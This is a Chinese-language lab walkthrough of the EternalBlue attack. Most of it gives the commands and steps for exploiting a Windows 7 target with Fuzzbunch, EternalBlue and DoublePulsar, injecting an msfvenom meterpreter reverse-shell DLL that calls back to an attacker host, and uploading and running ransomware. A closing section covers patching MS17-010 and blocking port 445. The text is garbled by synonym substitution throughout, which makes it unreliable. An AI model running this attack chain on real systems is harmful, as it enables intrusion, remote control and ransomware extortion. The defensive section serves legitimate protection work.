17年5月13日,犯警分子操纵NSA黑客兵器库泄露的“永久之蓝”倡议比特币病毒攻击事务。“永久之蓝”会扫描开放445文件共享端口的Windows机器,植入讹诈软件。因为以前国内屡次发作操纵445端口传布的蠕虫,运营商已对小我用户封掉445端口,但教育网还没有此限造,所以教育网是受攻击的重灾区!我们针对此病毒,解密其造造过程。
注:此陈述仅为科学研究,乱造病毒可不是闹着玩。按照中华人民共和国刑法第二百八十六条 违背国度规定,对计算机信息系统功用停止删除、修改、增加、干扰,形成计算机信息系统不克不及一般运行,后果严峻的,处五年以下有期徒刑或者拘役;后果出格严峻的,处五年以上有期徒刑。
永久之蓝东西阐发陈述
情况
攻击机1Win7 32位 专业版SP1192.168.61.133
攻击机2 kali2192.168.61.128
靶机win7 64位 旗舰版SP1192.168.61.129
尝试筹办
攻击机1安拆
python-2.6.6.msi
https://www.python.org/download/releases/2.6.6/
pywin32-221.win32-py2.6.exe
https://sourceforge.net/projects/pywin32/files/pywin32/Build%20221/
下载方程式东西包并解压
开启靶机,靶机能够不关防火墙,以至能够安拆杀毒软件,但不克不及打上对应补钉
尝试步调
攻击机1进入东西目次,运行fb.py
输入靶机IP 192.168.61.129
输入攻击者IP 192.168.61.133
No 不启动重定向
No 不需要开启日记
4 创建新工程
Uenit_test 输入工程名
Use Eternalblue
然后是一路回车,因为满是默认设置装备摆设
确认一下启动
因为启用了fuzzbunch扩展,失败了会主动屡次测验考试,有时候是一次就胜利。
然后是另一个攻击模块的共同利用Doublepulsar
同样的全回车
曲到选系统选择64位的
选择攻击体例选运行dll
接下去要选择dll途径,然而我们还没有,就先放一边
开启攻击机2 kali,用来生成dll
msfvenom -p
windows/x64/meterpreter/reverse_tcp LHOST=192.168.61.128 LPORT=9999 -f dll >
/root/桌面/uenit_attack.dll桌面目次下多了一个uenit_attack.dll,将其拷贝到攻击机1目次下
然后开启监听
msfconsole
msf > use
exploit/multi/handlermsf > set
LHOST 192.168.61.128msf > set
LPORT 9999msf > set
PAYLOAD windows/x64/meterpreter/reverse_tcpmsf > exploit
再回到攻击机1,已经将之前kali上的uenit_attack.dll拷贝到c:根目次下
然后输入dllpayload地址为 C:\\uenit_attack.dll
再一路回车
确认后起头
胜利以后返回kali查看,已近反弹回shell了。
Ipconfig
Dir
能够看到当前目次在c:\windows\system32
我们在当前创建一个目次并进入
然后上传我们的exe,好比讹诈软件
在靶机上的关于目次里,我们发现了上传上去的可施行法式
如下是当前靶机的界面
在攻击机中运行适才上传的讹诈软件
跳出了讹诈软件界面
而且发现讹诈软件加密了所有文档和图片,以及修改了壁纸。
防御办法
360nsa东西防御
然后就被要求安拆360平安卫士,接着就是打补钉,打上补钉一切就平安了
也能够自行打上微软补钉
https://technet.microsoft.com/zh-cn/library/security/MS17-010下载本身对应版本的补钉即可,查看本身系统版本,可在“我的电脑”或“计算机”上右键—属性即可
也有小伙伴希望白手起家,本身封闭端口
在起头菜单中选择“运行”或者win+r同时按呼出“运行”
输入gpedit.Msc呼出当地战略组编纂器
双击计算机设置装备摆设
Windows设置
平安设置
IP平安战略
右键空白处,选择创建IP战略
按照指示点击下一步
为战略定名后点击下一步
点击添加规则
为规则定名后点击添加
目的地址下拉选择“我的IP地址”,点击协议
协议下拉选择TCP,选择到此端口选择,填写445。
点击确定返回IP挑选器列表
点击确定返回新规则属性,点选封闭445那一规则
切换到挑选器操做栏目
点击添加操做
点选阻遏
在常规选项卡能够给那一操做定名,然后点确定
在那一战略上右键点击选择“分配”
我们验证下那一办法能否可行,再次用Eterblue东西攻击,得到
证明封闭445端口起感化了,一条封闭从外界到445端口数据的链路就被完全阻断了,为了避免nsa更多东西的攻击,需要封闭的端口还有135、137、138、139。
结语
目前,收集平安问题日益凸起,讹诈病毒也并非初次呈现,但是只要我们进步收集平安意识,及时打上系统补钉,留意杀毒软件的推送补钉,就能防备于未然。